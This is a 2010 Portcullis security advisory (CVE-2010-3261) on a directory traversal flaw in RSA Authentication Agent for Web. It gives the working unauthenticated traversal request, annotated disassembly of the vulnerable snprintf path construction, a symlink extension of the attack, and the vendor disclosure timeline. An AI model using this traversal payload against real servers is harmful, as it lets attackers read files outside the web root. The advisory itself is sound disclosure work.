Portcullis Security Advisory 10-001 Vulnerable System: RSA Authentication Agent for Web Vulnerability Title: mod_rsawebagent Is Vulnerable To Directory Traversal Vulnerability discovery and development: Portcullis Security Testing Services. Further research was then carried out and the vendor notified. Credit for Discovery: Tim Brown - Portcullis Computer Security Ltd. Affected systems: All known versions of RSA Authentication Agent for Web for Apache Web Server; the vulnerability was confirmed on mod_rsawebagent/7.0.0[315]. The vendor subsequently confirmed that both RSA Authentication Agent 7.0 for Web for Apache Web Server and RSA Authentication Agent 7.0 for Web for Internet Information Services are affected. The vendor was unable to reproduce this issue on older releases. Details: RSA Authentication Agent for Web for Apache Web Server allows you to protect all or selected web pages with RSA SecurID. The agent residing on a web server, intercepts all user requests for protected web pages. When a user attempts to access a URL that RSA SecurID protects, the agent requests the username and passcode and passes them to RSA Authentication Manager for authentication. If the authentication is successful, the agent stores the information in a cookie in the user's browser. As long as the cookie remains valid, the user is granted access to protected web pages. It is possible to pass a value in the GetPic-image parameter of requests to the web authentication URL handler which causes arbitrary files with the .jpg extention to be returned from outside the web root as follows: GET /webauthentication?GetPic?image=../../../../../../../usr/share/cups/doc-root/images/smiley HTTP/1.0 The value of the parameter is first URL decoded and then used as an argument to snprintf with a format string of "%s/%s.%s" within the CHTMLString::GetDefaultTemplate method: CHTMLString::GetDefaultTemplate(char const*image, char const*arg1, unsigned int*root): 0x00007f62edba638a <+0>: mov %rbx,-0x30(%rsp) 0x00007f62edba638f <+5>: mov %rbp,-0x28(%rsp) 0x00007f62edba6394 <+10>: mov %r12,-0x20(%rsp) 0x00007f62edba6399 <+15>: mov %r13,-0x18(%rsp) 0x00007f62edba639e <+20>: mov %r14,-0x10(%rsp) 0x00007f62edba63a3 <+25>: mov %r15,-0x8(%rsp) 0x00007f62edba63a8 <+30>: sub $0x558,%rsp 0x00007f62edba63af <+37>: mov %rdi,%r14 ; set $r14 to $rdi (arg1) 0x00007f62edba63b2 <+40>: mov %rsi,%rbx ; set $rbx to $rsi (image) 0x00007f62edba63b5 <+43>: mov %rdx,%r12 ; set $r12 to $rdx (root) 0x00007f62edba63b8 <+46>: mov %rcx,%r15 ; set $r15 to $rcx (arg3) 0x00007f62edba63bb <+49>: lea 0x20e69(%rip),%r8 ; set $r8 (arg4) to "Entering GetDefaultTemplate()" 0x00007f62edba63c2 <+56>: mov $0x486,%ecx ; $ecx (arg3) = 1158 0x00007f62edba63c7 <+61>: lea 0x20dee(%rip),%rdx ; set $rdx (arg2) to "genhtml.cpp" 0x00007f62edba63ce <+68>: mov $0x9,%esi ; $esi (arg1) = 9 0x00007f62edba63d3 <+73>: mov $0x2,%edi ; $edi (arg0) = 2 0x00007f62edba63d8 <+78>: mov $0x0,%eax ; $eax = 0 0x00007f62edba63dd <+83>: callq 0x7f62edb7d818 ; SDTraceMessage(2, 9, "genhtml.cpp", 1158, "Entering GetDefaultTemplate()"); 0x00007f62edba63e2 <+88>: lea 0x10(%rsp),%rbp ; set $rbp to "" 0x00007f62edba63e7 <+93>: mov 0x20(%r14),%r9 ; set $r9 (args2) to "jpg" (from arg1) 0x00007f62edba63eb <+97>: mov %rbx,%r8 ; set $r8 (args1) to "../../../../../../../usr/share/cups/doc-root/images/smiley" (from image) 0x00007f62edba63ee <+100>: mov %r12,%rcx ; set $rcx (args0) to "/opt/apache2/rsawebagent/Templates" (from root) 0x00007f62edba63f1 <+103>: lea 0x20eb6(%rip),%rdx ; set $rdx (format) to "%s/%s.%s" 0x00007f62edba63f8 <+110>: mov $0x400,%esi ; $esi (size) = 1024 0x00007f62edba63fd <+115>: mov %rbp,%rdi ; set $rdi (str) to "" 0x00007f62edba6400 <+118>: mov $0x0,%eax ; $eax (nwritten) = 0 => 0x00007f62edba6405 <+123>: callq 0x7f62edb7cee8 ; snprintf(str, 1024, "%s/%s.%s", "/opt/apache2/rsawebagent/Templates", "../../../../../../../usr/share/cups/doc-root/images/smiley", "jpg"); 0x00007f62edba640a <+128>: dec %eax ; $eax -- 0x00007f62edba640c <+130>: cmp $0x3fe,%eax ; is 1022 <= $eax (nwritten) 0x00007f62edba6411 <+135>: jbe 0x7f62edba644f <_ZN11CHTMLString18GetDefaultTemplateEPKcS1_Pj+197> 0x00007fbb34042413 <+137>: movb $0x0,0x40f(%rsp) ; 0x40f(%rsp) = 0 0x00007fbb3404241b <+145>: mov %rbp,%r9 ; set $r9 (args5) to $rbp (str) 0x00007fbb3404241e <+148>: lea 0x213c3(%rip),%r8 ; set $r8 (arg4) to "Leaving GetDefaultTemplate(), buffer overflow for template %s" 0x00007fbb34042425 <+155>: mov $0x492,%ecx ; $ecx (arg3) = 1170 0x00007fbb3404242a <+160>: lea 0x20d8b(%rip),%rdx ; set $rdx (arg2) to "genhtml.cpp" 0x00007fbb34042431 <+167>: mov $0x9,%esi ; $esi (arg1) = 9 0x00007fbb34042436 <+172>: mov $0x4,%edi ; $edi (arg0) = 4 0x00007fbb3404243b <+177>: mov $0x0,%eax ; $eax = 0 0x00007fbb34042440 <+182>: callq 0x7fbb34019818 ; SDTraceMessage(2, 9, "genhtml.cpp", 1170, "Leaving GetDefaultTemplate(), buffer overflow for template %s", "/opt/apache2/rsawebagent/Templates/../../../../../../usr/share/cups/doc-root/images/smiley.jpg"); 0x00007fbb34042445 <+187>: mov $0x0,%eax ; $eax = 0 ... This results in /opt/apache2/rsawebagent/Templates/../../../../../../usr/share/cups/doc-root/images/smiley.jpg being returned. The path is then stat'd to confirm its existence before it is passed to CHTMLString::ReadTemplate which opens, stats and then reads the file to freshly allocated memory. Note that no credentials are required to perform this attack. A user with access to the underlying host either via a normal shell or for example by sftp can extend this attack by creating a hard or symbolic link from any file accessible by the web server user to any location to which they have write access with the .jpg extension in order to read it. Interestingly, if $eax is greater or equal to 1022 after the initial snprintf, then the code detects this as a potential buffer overflow and logs an error before returning. At a guess, the code used to use sprintf, which was a primitive attempt to catch stack overflows. In the process of researching this vulnerability, two further undocumented parameters GetFile?file and GetStyleSheet?style were identified which to have the same issue. Whilst the former sounds useful, in practice, it was determined that GetFile can only be used to access files with the .htm extension. Moreover both undocumented parameters required valid credentials to access their functionality in the agents default configuration. Impact: An attacker could cause access to arbitrary files. Exploit: Exploit code is not required. Vendor status: 05/07/2010 - Vendor informed via email 07/07/2010 - vendor responds confirming receipt and requesting further information about platform on which the issue was discovered 14/07/2010 - vendor confirms the issue and commits to provide an update in due course 30/07/2010 - vendor suggests disclosure date of 20/09/2010 10/09/2010 - vendor confirms disclosure date of 20/09/2010 and informs Portcullis that CVE-2010-3261 has been assigned to this issue 21/09/2010 - Vendor confirms they release the patch and advisory to their customers on 20/09/2010 22/09/2010 - Publication Copyright: Copyright © Portcullis Computer Security Limited 2010, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited. Disclaimer: The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.